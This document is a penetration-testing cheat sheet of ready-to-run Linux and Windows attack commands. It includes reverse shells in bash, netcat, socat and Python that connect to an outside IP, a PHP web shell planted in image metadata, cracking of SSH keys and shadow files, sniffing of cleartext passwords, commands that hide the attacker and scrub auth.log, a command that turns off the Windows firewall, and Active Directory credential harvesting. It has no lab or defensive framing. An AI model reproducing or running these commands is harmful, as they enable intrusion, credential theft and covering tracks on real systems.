PENTEST CHEATSHEET
Linux
Find user owned files
find / -user $(whoami) 2>/dev/null | egrep -v '(/proc)'
Find writeable files
find / -writeable 2>/dev/null | egrep -v '(/proc|/run|/dev)'
Find readable files with following extensions
find / -readable 2>/dev/null | egrep '(\.key$|\.pub$|\.bak$|\.crt$|\.ca$|^id_rsa)'
Bash reverse shell
bash -i >& /dev/tcp/10.10.10.10/444 0>&1
Netcat reverse shell
nc -e /bin/bash 10.10.10.10 444
nc -e /bin.sh 10.10.10.10 444
Socat reverse shell
socat file:`tty`,raw,echo=0 tcp-listen:444 #listener
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:444 #payload
Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Upgrade shell with Python
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
F+G+ENTER
export TERM=xterm
Fix terminal
stty -a
stty cols rows
Find files that aren’t installed by the system
for i in $(ls $(pwd)/*); do dpkg --search $i 1>/dev/null; done
Inject PHP into image
exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' backdoor.jpeg
exiftool “-comment<=back.php” back.png
Cracking SSH
ssh2john id_rsa > id_rsa.hash
john --wordlist=wordlist.txt id_rsa.hash
Cracking /etc/shadow
unshadow passwd.hashes shadow.hashes > unshadowed_passwords.txt
john --wordlist=wordlist.txt passwords.txt
WFUZZ
wfuzz -w /usr/share/wordlists/dirb/common.txt --hc 404,500 -u http://10.10.10.168:8080/
Hiding tracks
Hiding bash history
unset HISTFILE
Commit ‘suicide’ when exiting shell
kill -9 $$
Hide commands
exec -a syslogd <command here>
Hide from /var/log/utmp, w
, who
, .profile
, .bash_profile
, known_hosts
.
ssh -o UserKnownHostsFile=/dev/null -T user@host.org "bash -i"
SSH tunnel out
# bypass local firewalls or IP filtering
# connect to localhost:31337 and get connected to 1.2.4.3:80 appearing as user@host.org
ssh -g -L31337:1.2.3.4:80 user@host.org
SSH tunnel in
# access private machine
# connect to host.org:31338 get forwarded to 10.10.10.10:80 via localhost
ssh -o ExitOnForwardFailure=yes -g -R31338:10.10.10.10:80 user@host.org
SSH socks4/5 IN
# reverse dynamic forwarding
# configure host.org:1080 as SOCKS4/5 proxy and connect to any internal address/port where the system SSH was executed from has access to
ssh -R 1080 user@host.org
Monitor new TCP connections
tcpdump -n "tcp[tcpflags] == tcp-syn"
Other TCPDUMP
tcpdump -i eth0 'port 80'
tcpdump -i eth0 [udp | proto 17]
tcpdump -vv -x -X -s 1500 -i eth0 'port 80'
tcpdump -i eth0 host 10.10.10.10
tcpdump -i eth0 dst 10.10.10.10
tcpdump -i eth0 -n icmp
tcpdump dst port 123
tcpdump port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '
Clear logfile
cd /dev/shm
grep -v '10\.10\.10\.10' /var/log/auth.log >a.log; cat a.log >/var/log/auth.log; rm -f a.log
Windows
SMB
smbclient -L //10.10.10.10 #list shares
smbclient -U ''
smbmap -H 10.10.10.10 #list shares
smbmap -R [share] -H 10.10.10.10 #list contents of share
smbmap -d domain -u user -p password -H 10.10.10.10 #login with user
crackmapexec smb 10.10.10.10 --shares -u '' -p ''
GPP groups.xml
gpp-decrypt hash
Active Directory: impacket
GetADUsers.py -all domain/user -dc-ip 10.10.10.10
GetUserSPN.py -request[-user] [user] -dc-ip 10.10.10.10 domain/user #kerberoast
Active Directory
rpcclient 10.10.10.10
rpcclient 10.10.10.10 -U ''
enumdomusers
Kerberos
kerbrute userenum --dc 10.10.10.10 -d domain -o outfile.out users.lst
Create session with credentials for remote access only
runas /netonly /user:domain\username cmd
Shell via SMB: psexec.py
psexec.py domain/user@10.10.10.10
Metasploit windows meterpreter session
execute -f cmd.exe -c -H
shell
netsh firewall show opmode
netsh advfirewall set allprofiles state off
getsystem
Get-DomainUser -LDAPFilter "(userpassword=*)" | Measure-Object | Select-Object Count
Get-DomainUser -LDAPFilter "(userpassword=*)" -Properties samaccountname,userpassword | % { [pscustomobject]@{samaccountname=$_.samaccountname; userpassword=[System.Text.Encoding]::ASCII.GetString($_.userpassword)} }